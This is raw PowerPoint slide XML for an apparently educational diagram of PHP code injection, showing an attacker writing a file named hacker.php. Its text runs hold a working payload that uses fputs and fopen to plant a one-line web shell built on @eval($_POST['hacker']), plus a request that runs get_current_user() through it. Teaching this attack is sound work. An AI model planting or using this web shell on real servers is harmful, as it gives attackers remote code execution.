                  <a:effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>H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1B859"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>acker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91B859"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=echo </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="91B859"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>get_current_user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91B859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40774B4-D898-4E06-9247-5FD8F563D633}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5163127" y="4157154"/>
              <a:ext cx="3583709" cy="332509"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="22225">
              <a:solidFill>
                <a:srgbClr val="90A4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1" name="图形 20" descr="V 形箭头 轮廓">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCBBD840-78FD-44DA-868A-186EE93C0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7317550" y="4137815"/>
            <a:ext cx="595745" cy="595745"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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A013C3E-1C12-4833-B948-3ED6A3A7722E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6500132" y="4204779"/>
            <a:ext cx="489527" cy="739699"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2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00326FE-BCAF-47EA-9B94-9C8F52FED54C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5829486" y="3290378"/>
            <a:ext cx="766618" cy="222323"/>
            <a:chOff x="3648364" y="2355273"/>
            <a:chExt cx="766618" cy="646546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5784B8C-8BE5-4EE4-94A0-E4F8103F65E4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3648364" y="2355273"/>
              <a:ext cx="0" cy="646546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A75CA903-B2EB-4305-BB44-CB517ED720EB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4414982" y="2355273"/>
              <a:ext cx="0" cy="646546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32D016C-EE96-48E1-A9A4-3068E296BF96}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3648364" y="2355273"/>
              <a:ext cx="766618" cy="0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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{858DA5C4-60A3-4594-A986-C6735DD5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85" y="1006803"/>
            <a:ext cx="854645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fputs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53935"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(fopen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1B859"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>‘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91B859"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hacker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1B859"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.php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91B85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91B859"/>
                </a:solidFill>
                <a:latin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1B85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91B85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) , </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8D64FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>‘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53935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1B859"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>’hacker‘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altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7C4DFF"/>
                </a:solidFill>
                <a:latin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32E0AB3F-B7AC-4751-AADC-1AB40FCA43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17688" y="1793588"/>
            <a:ext cx="1971965" cy="1451262"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="158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9856860-AE1C-4F39-B789-2EC9CBC1E274}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2161312" y="861214"/>
            <a:ext cx="3343562" cy="544945"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="90A4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D691832-19C7-4811-9FDE-59FBBB27590A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4378036" y="1921162"/>
            <a:ext cx="0" cy="1450109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折角 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{736B5A11-DF17-44E3-81C5-499489360BFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="3962402" y="3463636"/>
            <a:ext cx="960581" cy="794325"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="15875">
            <a:solidFill>
              <a:srgbClr val="92A5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F306741-D8C4-4B12-9526-A3B7A1F907A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3990110" y="3733840"/>
            <a:ext cx="11268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5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hacker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.php</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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EC7A5756-0F22-4762-A200-5A1AB3199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333" y="3726069"/>
            <a:ext cx="36468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53935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1B859"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'hacker'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4DE65C1-679D-4D07-AE15-F780AEF1D73B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2124363" y="2784703"/>
            <a:ext cx="360219" cy="36021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C2110E0-9878-4C04-98EF-3D7C4D642598}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2151225" y="27801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38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ACDA0E6-51C7-41C0-A453-3E6583FE28C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="628073" y="554183"/>
            <a:ext cx="11018982" cy="5347854"/>
            <a:chOff x="628073" y="554183"/>
            <a:chExt cx="11018982" cy="534785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9C73F1F-217C-4D4D-B665-3FF5D84C573A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1514487" y="1112588"/>
              <a:ext cx="9246154" cy="4231044"/>
              <a:chOff x="1548885" y="861214"/>
              <a:chExt cx="9246154" cy="4231044"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="9" name="图形 8" descr="男程序员 轮廓">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97E1A09C-2C12-4FB4-B55B-12DAD2C61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20161" y="2002022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1A1A92AB-27AC-4605-ADDA-A7F41899D662}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="7426955" y="2390710"/>
                <a:ext cx="3368084" cy="536027"/>
                <a:chOff x="6274677" y="1474076"/>
                <a:chExt cx="3029601" cy="536027"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="11" name="对话气泡: 圆角矩形 10">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E93486D-8C7D-4E7D-B2B3-7D2FD1341F21}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6274677" y="1474076"/>
                  <a:ext cx="2830208" cy="536027"/>
                </a:xfrm>
                <a:prstGeom prst="wedgeRoundRectCallout">
                  <a:avLst>
                    <a:gd name="adj1" fmla="val -33267"/>
                    <a:gd name="adj2" fmla="val 69853"/>
                    <a:gd name="adj3" fmla="val 16667"/>
                  </a:avLst>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="22225">
                  <a:solidFill>
                    <a:srgbClr val="90A4A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Rectangle 1">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FB686C9-2EF7-4F71-A06E-74155F83D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86813" y="1618979"/>
                  <a:ext cx="2917465" cy="246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600" dirty="0">
                      <a:solidFill>
                        <a:srgbClr val="91B859"/>
                      </a:solidFill>
                      <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>“echo </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                      <a:solidFill>
                        <a:srgbClr val="91B859"/>
                      </a:solidFill>
                      <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>get_current_user</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                      <a:solidFill>
                        <a:srgbClr val="91B859"/>
                      </a:solidFill>
                      <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>();”</a:t>
                  </a:r>
                  <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="91B859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E66D7B2F-FD7C-46A4-8767-DA05C957FBAD}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5394870" y="3576707"/>
                <a:ext cx="3659870" cy="544945"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="22225">
                <a:solidFill>
                  <a:srgbClr val="90A4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6" name="图形 15" descr="V 形箭头 轮廓">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBB0CE02-52CB-4AD3-98FB-D9DCD0463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7317550" y="2974034"/>
                <a:ext cx="595745" cy="595745"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic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6BD985D-38CF-4B17-8476-35E0D098ECF6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="6998895" y="4759749"/>
                <a:ext cx="3583709" cy="332509"/>
                <a:chOff x="5163127" y="4157154"/>
                <a:chExt cx="3583709" cy="332509"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="18" name="Rectangle 1">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD4B5096-CEF5-4136-95BF-8FB6993F8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5723" y="4200298"/>
                  <a:ext cx="3478516" cy="246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>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                      <a:solidFill>
                        <a:srgbClr val="91B859"/>
                      </a:solidFill>
                      <a:effectLst/>
                      <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>H</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                      <a:solidFill>
                        <a:srgbClr val="91B859"/>
                      </a:solidFill>
                      <a:effectLst/>
                      <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>acker</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                      <a:solidFill>
                        <a:srgbClr val="91B859"/>
                      </a:solidFill>
                      <a:effectLst/>
                      <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>=echo </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                      <a:solidFill>
                        <a:srgbClr val="91B859"/>
                      </a:solidFill>
                      <a:effectLst/>
                      <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>get_current_user</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                      <a:solidFill>
                        <a:srgbClr val="91B859"/>
                      </a:solidFill>
                      <a:effectLst/>
                      <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>();</a:t>
                  </a:r>
                  <a:endPara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640774B4-D898-4E06-9247-5FD8F563D633}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5163127" y="4157154"/>
                  <a:ext cx="3583709" cy="332509"/>
                </a:xfrm>
                <a:prstGeom prst="roundRect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="22225">
                  <a:solidFill>
                    <a:srgbClr val="90A4A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pic>
            <p:nvPicPr>
              <p:cNvPr id="21" name="图形 20" descr="V 形箭头 轮廓">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCBBD840-78FD-44DA-868A-186EE93C0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7317550" y="4137815"/>
                <a:ext cx="595745" cy="595745"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic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CA013C3E-1C12-4833-B948-3ED6A3A7722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500132" y="4204779"/>
                <a:ext cx="489527" cy="739699"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector2">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="2222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600326FE-BCAF-47EA-9B94-9C8F52FED54C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5829486" y="3290378"/>
                <a:ext cx="766618" cy="222323"/>
                <a:chOff x="3648364" y="2355273"/>
                <a:chExt cx="766618" cy="646546"/>
              </a:xfrm>
            </p:grpSpPr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F5784B8C-8BE5-4EE4-94A0-E4F8103F65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48364" y="2355273"/>
                  <a:ext cx="0" cy="646546"/>
                </a:xfrm>
                <a:prstGeom prst="straightConnector1">
                  <a:avLst/>
                </a:prstGeom>
                <a:ln w="158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A75CA903-B2EB-4305-BB44-CB517ED72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4982" y="2355273"/>
                  <a:ext cx="0" cy="646546"/>
                </a:xfrm>
                <a:prstGeom prst="straightConnector1">
                  <a:avLst/>
                </a:prstGeom>
                <a:ln w="158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232D016C-EE96-48E1-A9A4-3068E296B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48364" y="2355273"/>
                  <a:ext cx="766618" cy="0"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:ln w="158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1">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{858DA5C4-60A3-4594-A986-C6735DD52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885" y="1006803"/>
                <a:ext cx="854645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7C4DFF"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>&lt;?php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0A4AE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39ADB5"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>fputs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E53935"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>(fopen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0A4AE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zh-CN" sz="1600" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="91B859"/>
                    </a:solidFill>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>‘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91B859"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>hacker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1B859"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>.php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91B859"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>’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0A4AE"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>,</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="91B859"/>
                    </a:solidFill>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>’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1B859"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>w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91B859"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>’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0A4AE"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>) , </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="8D64FF"/>
                    </a:solidFill>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>‘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7C4DFF"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>&lt;?php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0A4AE"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t> @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39ADB5"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>eval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0A4AE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E53935"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>$_POST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0A4AE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1B859"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>’hacker‘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0A4AE"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>]);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7C4DFF"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>?&gt;</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="7C4DFF"/>
                    </a:solidFill>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>’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0A4AE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7C4DFF"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>?&gt;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8" name="连接符: 肘形 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32E0AB3F-B7AC-4751-AADC-1AB40FCA43A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17688" y="1793588"/>
                <a:ext cx="1971965" cy="1451262"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector3">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="15875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C9856860-AE1C-4F39-B789-2EC9CBC1E274}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2161312" y="861214"/>
                <a:ext cx="3343562" cy="544945"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="22225">
                <a:solidFill>
                  <a:srgbClr val="90A4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BD691832-19C7-4811-9FDE-59FBBB27590A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4378036" y="1921162"/>
                <a:ext cx="0" cy="1450109"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="158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: 折角 31">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{736B5A11-DF17-44E3-81C5-499489360BFD}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="16200000">
                <a:off x="3962402" y="3463636"/>
                <a:ext cx="960581" cy="794325"/>
              </a:xfrm>
              <a:prstGeom prst="foldedCorner">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="15875">
                <a:solidFill>
                  <a:srgbClr val="92A5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306741-D8C4-4B12-9526-A3B7A1F907A2}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3990110" y="3733840"/>
                <a:ext cx="1126836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105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Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>hacker</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="105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Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>.php</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="105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Rectangle 1">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC7A5756-0F22-4762-A200-5A1AB3199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8333" y="3726069"/>
                <a:ext cx="3646832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7C4DFF"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>&lt;?php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0A4AE"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t> @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39ADB5"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>eval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0A4AE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E53935"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>$_POST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0A4AE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1B859"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'hacker'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90A4AE"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>]);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7C4DFF"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>?&gt;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EFB42B1-57B5-45EE-AE82-45CF6855007E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="628073" y="554183"/>
              <a:ext cx="11018982" cy="53478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337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C8124766-037C-4DE4-B46C-EDE123426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95" y="2030732"/>
            <a:ext cx="3682265" cy="191081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733BDEA-252E-4C90-AE21-324878607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918" y="4425077"/>
            <a:ext cx="508518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 fputs( fopen(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1B859"/>
                </a:solidFill>
                <a:effectLst/>
